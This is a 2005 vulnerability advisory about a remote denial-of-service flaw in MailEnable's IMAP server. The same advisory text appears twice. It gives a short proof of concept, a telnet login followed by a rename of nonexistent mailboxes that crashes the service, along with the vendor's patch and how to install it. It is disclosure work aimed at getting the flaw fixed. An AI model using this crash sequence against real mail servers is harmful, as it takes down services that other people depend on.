Josh Zlatin
25/11/05, 11:15
Synopsis: MailEnable Imap Remote DOS.
Product: MailEnable Pro
MailEnable Enterprise
http://www.mailenable.com
Version: Confirmed on MailEnable Pro 1.7 and MailEnable Enterprise 1.1
Author: Josh Zlatin-Amishav
Date: November 24, 2005
Background:
MailEnable's mail server software provides a powerful, scalable hosted
messaging platform for Microsoft Windows. MailEnable offers stability,
unsurpassed flexibility and an extensive feature set which allows you to
provide cost-effective mail services.
Issue:
In working with researchers at Tenable Network Security, I have come across
a Denial of Service attack in the MailEnable Pro and MailEnable Enterprise
IMAP server. It is possible to remotely crash the IMAP server by sending a
rename request with non existant mailbox names
PoC:
telnet localhost 143
a1 login josh byebye
a2 rename foo bar
where josh and byebye are the login credentials for an existing mailbox.
Vendor notified: November 24, 2005 10:50AM
Patch released: November 24, 2005 13:28PM
Solution:
Download patch from: http://www.mailenable.com/hotfix/MEIMAPS.ZIP
To install:
1) Stop the IMAP service
2) Rename the MEIMAPS.EXE file in the Mail Enable\bin directory as this will
allow you to roll back this fix
3) Extract the zip file from the URL above to the Mail Enable\bin directory
4) Start the IMAP service
References: http://zur.homelinux.com/Advisories/MailEnableImapDos.txt
Product: MailEnable Pro
MailEnable Enterprise
http://www.mailenable.com
Version: Confirmed on MailEnable Pro 1.7 and MailEnable Enterprise 1.1
Author: Josh Zlatin-Amishav
Date: November 24, 2005
Background:
MailEnable's mail server software provides a powerful, scalable hosted
messaging platform for Microsoft Windows. MailEnable offers stability,
unsurpassed flexibility and an extensive feature set which allows you to
provide cost-effective mail services.
Issue:
In working with researchers at Tenable Network Security, I have come across
a Denial of Service attack in the MailEnable Pro and MailEnable Enterprise
IMAP server. It is possible to remotely crash the IMAP server by sending a
rename request with non existant mailbox names
PoC:
telnet localhost 143
a1 login josh byebye
a2 rename foo bar
where josh and byebye are the login credentials for an existing mailbox.
Vendor notified: November 24, 2005 10:50AM
Patch released: November 24, 2005 13:28PM
Solution:
Download patch from: http://www.mailenable.com/hotfix/MEIMAPS.ZIP
To install:
1) Stop the IMAP service
2) Rename the MEIMAPS.EXE file in the Mail Enable\bin directory as this will
allow you to roll back this fix
3) Extract the zip file from the URL above to the Mail Enable\bin directory
4) Start the IMAP service
References: http://zur.homelinux.com/Advisories/MailEnableImapDos.txt